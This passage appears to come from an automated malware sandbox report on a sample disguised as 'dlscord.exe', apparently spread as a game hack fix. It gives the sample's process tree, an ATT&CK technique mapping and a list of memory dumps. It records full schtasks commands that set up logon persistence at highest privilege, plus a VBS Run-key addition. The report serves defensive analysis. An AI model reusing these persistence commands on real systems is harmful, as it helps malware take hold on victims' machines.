        
        "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:932
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "dlscord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe" /rl HIGHEST /f
        6⤵
        Creates scheduled task(s)
        
        PID:3792
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MpR4xPfntoE2.bat" "
        6⤵
        
        PID:984
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:3572
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        7⤵
        Runs ping.exe
        
        PID:3136
        
        C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe
        
        "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2336
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "dlscord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe" /rl HIGHEST /f
        8⤵
        Creates scheduled task(s)
        
        PID:1036
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fKDa3DnfVq6e.bat" "
        8⤵
        
        PID:1520
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        9⤵
        
        PID:1612
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        9⤵
        Runs ping.exe
        
        PID:3208
        
        C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe
        
        "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3528
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "dlscord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe" /rl HIGHEST /f
        10⤵
        Creates scheduled task(s)
        
        PID:952
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JnRP6cCfZP9P.bat" "
        10⤵
        
        PID:3044
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        11⤵
        
        PID:980
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        11⤵
        Runs ping.exe
        
        PID:2896
        
        C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe
        
        "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe"
        11⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1372
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "dlscord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe" /rl HIGHEST /f
        12⤵
        Creates scheduled task(s)
        
        PID:3264
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iymc2pI6fiPY.bat" "
        12⤵
        
        PID:2204
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        13⤵
        
        PID:4000
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        13⤵
        Runs ping.exe
        
        PID:832
        
        C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe
        
        "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe"
        13⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4092
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "dlscord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe" /rl HIGHEST /f
        14⤵
        Creates scheduled task(s)
        
        PID:1180
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vcj1jgzwBZg9.bat" "
        14⤵
        
        PID:1680
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        15⤵
        
        PID:1928
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        15⤵
        Runs ping.exe
        
        PID:3184
        
        C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe
        
        "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe"
        15⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2976
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "dlscord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe" /rl HIGHEST /f
        16⤵
        Creates scheduled task(s)
        
        PID:508
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AkcSaDbhL2I4.bat" "
        16⤵
        
        PID:948
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        17⤵
        
        PID:2940
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        17⤵
        Runs ping.exe
        
        PID:608
        
        C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe
        
        "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe"
        17⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:924
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "dlscord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe" /rl HIGHEST /f
        18⤵
        Creates scheduled task(s)
        
        PID:3560
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GMedgjBYX3ly.bat" "
        18⤵
        
        PID:436
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        19⤵
        
        PID:2000
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        19⤵
        Runs ping.exe
        
        PID:3944
        
        C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe
        
        "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe"
        19⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3108
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "dlscord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe" /rl HIGHEST /f
        20⤵
        Creates scheduled task(s)
        
        PID:1376
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bP15bi36Uj7h.bat" "
        20⤵
        
        PID:832
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        21⤵
        
        PID:3884
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        21⤵
        Runs ping.exe
        
        PID:60
        
        C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe
        
        "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe"
        21⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3620
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "dlscord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe" /rl HIGHEST /f
        22⤵
        Creates scheduled task(s)
        
        PID:2336
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mHZB0T3DpkTa.bat" "
        22⤵
        
        PID:3232
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        23⤵
        
        PID:1648
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        23⤵
        Runs ping.exe
        
        PID:2720
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "Start-Process -FilePath (Join-Path -Path ($pwd).path -ChildPath 'PaladinsHackFIX.zip')"
    3⤵
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4004

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3456
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution.vbs"
  2⤵
  - Adds Run key to start application
  PID:644

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1696

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/652-140-0x0000000007F00000-0x0000000007F01000-memory.dmp

Filesize
4KB

Download
memory/652-123-0x0000000003310000-0x0000000003311000-memory.dmp

Filesize
4KB

Download
memory/652-146-0x0000000008670000-0x0000000008671000-memory.dmp

Filesize
4KB

Download
memory/652-185-0x00000000070F3000-0x00000000070F4000-memory.dmp

Filesize
4KB

Download
memory/652-142-0x0000000008250000-0x0000000008251000-memory.dmp

Filesize
4KB

Download
memory/652-186-0x0000000009950000-0x0000000009951000-memory.dmp

Filesize
4KB

Download
memory/652-174-0x0000000009470000-0x0000000009471000-memory.dmp

Filesize
4KB

Download
memory/652-148-0x0000000003310000-0x0000000003311000-memory.dmp

Filesize
4KB

Download
memory/652-132-0x00000000070F2000-0x00000000070F3000-memory.dmp

Filesize
4KB

Download
memory/652-161-0x00000000093F0000-0x0000000009423000-memory.dmp

Filesize
204KB

Download
memory/652-125-0x0000000003310000-0x0000000003311000-memory.dmp

Filesize
4KB

Download
memory/652-173-0x000000007E7F0000-0x000000007E7F1000-memory.dmp

Filesize
4KB

Download
memory/652-134-0x00000000075C0000-0x00000000075C1000-memory.dmp

Filesize
4KB

Download
memory/652-168-0x0000000009450000-0x0000000009451000-memory.dmp

Filesize
4KB

Download
memory/652-128-0x0000000007730000-0x0000000007731000-memory.dmp

Filesize
4KB

Download
memory/652-130-0x00000000070F0000-0x00000000070F1000-memory.dmp

Filesize
4KB

Download
memory/700-956-0x0000000004E10000-0x0000000004E11000-memory.dmp

Filesize
4KB

Download
memory/700-957-0x0000000004E12000-0x0000000004E13000-memory.dmp

Filesize
4KB

Download
memory/700-985-0x0000000004E13000-0x0000000004E14000-memory.dmp

Filesize
4KB

Download
memory/924-1093-0x000000001B420000-0x000000001B422000-memory.dmp

Filesize
8KB

Download
memory/932-1018-0x000000001BB60000-0x000000001BB62000-memory.dmp

Filesize
8KB

Download
memory/1184-730-0x0000000007152000-0x0000000007153000-memory.dmp

Filesize
4KB

Download
memory/1184-729-0x0000000007150000-0x0000000007151000-memory.dmp

Filesize
4KB

Download
memory/1184-748-0x0000000007153000-0x0000000007154000-memory.dmp

Filesize
4KB

Download
memory/1372-699-0x0000000002FB0000-0x0000000002FB1000-memory.dmp

Filesize
4KB

Download
memory/1372-1057-0x000000001B600000-0x000000001B602000-memory.dmp

Filesize
8KB

Download
memory/1372-700-0x0000000002FB2000-0x0000000002FB3000-memory.dmp

Filesize
4KB

Download
memory/1372-714-0x0000000002FB3000-0x0000000002FB4000-memory.dmp

Filesize
4KB

Download
memory/2144-955-0x00000000047F3000-0x00000000047F4000-memory.dmp

Filesize
4KB

Download
memory/2144-921-0x00000000047F2000-0x00000000047F3000-memory.dmp

Filesize
4KB

Download
memory/2144-918-0x00000000047F0000-0x00000000047F1000-memory.dmp

Filesize
4KB

Download
memory/2336-1031-0x000000001B1C0000-0x000000001B1C2000-memory.dmp

Filesize
8KB

Download
memory/2456-133-0x0000000006C82000-0x0000000006C83000-memory.dmp

Filesize
4KB

Download
memory/2456-144-0x0000000008260000-0x0000000008261000-memory.dmp

Filesize
4KB

Download
memory/2456-256-0x0000000006C83000-0x0000000006C84000-memory.dmp

Filesize
4KB

Download
memory/2456-184-0x0000000009380000-0x0000000009381000-memory.dmp

Filesize
4KB

Download
memory/2456-122-0x0000000000D00000-0x0000000000D01000-memory.dmp

Filesize
4KB

Download
memory/2456-124-0x0000000000D00000-0x0000000000D01000-memory.dmp

Filesize
4KB

Download
memory/2456-183-0x0000000009FE0000-0x0000000009FE1000-memory.dmp

Filesize
4KB

Download
memory/2456-160-0x0000000008ED0000-0x0000000008ED1000-memory.dmp

Filesize
4KB

Download
memory/2456-156-0x0000000009960000-0x0000000009961000-memory.dmp

Filesize
4KB

Download
memory/2456-126-0x00000000046F0000-0x00000000046F1000-memory.dmp

Filesize
4KB

Download
memory/2456-150-0x0000000000D00000-0x0000000000D01000-memory.dmp

Filesize
4KB

Download
memory/2456-257-0x0000000006C84000-0x0000000006C86000-memory.dmp

Filesize
8KB

Download
memory/2456-131-0x0000000006C80000-0x0000000006C81000-memory.dmp

Filesize
4KB

Download
memory/2456-138-0x0000000007250000-0x0000000007251000-memory.dmp

Filesize
4KB

Download
memory/2456-136-0x00000000071E0000-0x00000000071E1000-memory.dmp

Filesize
4KB

Download
memory/2976-1081-0x000000001BAA0000-0x000000001BAA2000-memory.dmp

Filesize
8KB

Download
memory/3108-1105-0x0000000002930000-0x0000000002932000-memory.dmp

Filesize
8KB

Download
memory/3264-665-0x0000000004420000-0x0000000004421000-memory.dmp

Filesize
4KB

Download
memory/3264-666-0x0000000004422000-0x0000000004423000-memory.dmp

Filesize
4KB

Download
memory/3264-986-0x0000000000830000-0x0000000000832000-memory.dmp

Filesize
8KB

Download
memory/3264-684-0x0000000004423000-0x0000000004424000-memory.dmp

Filesize
4KB

Download
memory/3368-750-0x0000000006A40000-0x0000000006A41000-memory.dmp

Filesize
4KB

Download
memory/3368-752-0x0000000006A42000-0x0000000006A43000-memory.dmp

Filesize
4KB

Download
memory/3368-774-0x0000000006A43000-0x0000000006A44000-memory.dmp

Filesize
4KB

Download
memory/3524-816-0x0000000004600000-0x0000000004601000-memory.dmp

Filesize
4KB

Download
memory/3524-818-0x0000000004602000-0x0000000004603000-memory.dmp

Filesize
4KB

Download
memory/3524-848-0x0000000004603000-0x0000000004604000-memory.dmp

Filesize
4KB

Download
memory/3528-1043-0x000000001B1A0000-0x000000001B1A2000-memory.dmp

Filesize
8KB

Download
memory/3556-917-0x0000000007013000-0x0000000007014000-memory.dmp

Filesize
4KB

Download
memory/3556-849-0x0000000007010000-0x0000000007011000-memory.dmp

Filesize
4KB

Download
memory/3556-850-0x0000000007012000-0x0000000007013000-memory.dmp

Filesize
4KB

Download
memory/3568-417-0x0000000007300000-0x0000000007301000-memory.dmp

Filesize
4KB

Download
memory/3568-510-0x0000000007303000-0x0000000007304000-memory.dmp

Filesize
4KB

Download
memory/3568-419-0x0000000007302000-0x0000000007303000-memory.dmp

Filesize
4KB

Download
memory/3568-440-0x000000007EE30000-0x000000007EE31000-memory.dmp

Filesize
4KB

Download
memory/3620-1115-0x0000000001750000-0x0000000001752000-memory.dmp

Filesize
8KB

Download
memory/3680-920-0x0000000005300000-0x00000000057FE000-memory.dmp

Filesize
5.0MB

Download
memory/3872-922-0x0000000004DF0000-0x0000000004DF1000-memory.dmp

Filesize
4KB

Download
memory/3984-790-0x0000000006B92000-0x0000000006B93000-memory.dmp

Filesize
4KB

Download
memory/3984-804-0x0000000006B93000-0x0000000006B94000-memory.dmp

Filesize
4KB

Download
memory/3984-789-0x0000000006B90000-0x0000000006B91000-memory.dmp

Filesize
4KB

Download
memory/4004-1017-0x0000000004973000-0x0000000004974000-memory.dmp

Filesize
4KB

Download
memory/4004-988-0x0000000004972000-0x0000000004973000-memory.dmp

Filesize
4KB

Download
memory/4004-987-0x0000000004970000-0x0000000004971000-memory.dmp

Filesize
4KB

Download
memory/4092-1069-0x000000001BAD0000-0x000000001BAD2000-memory.dmp

Filesize
8KB

Download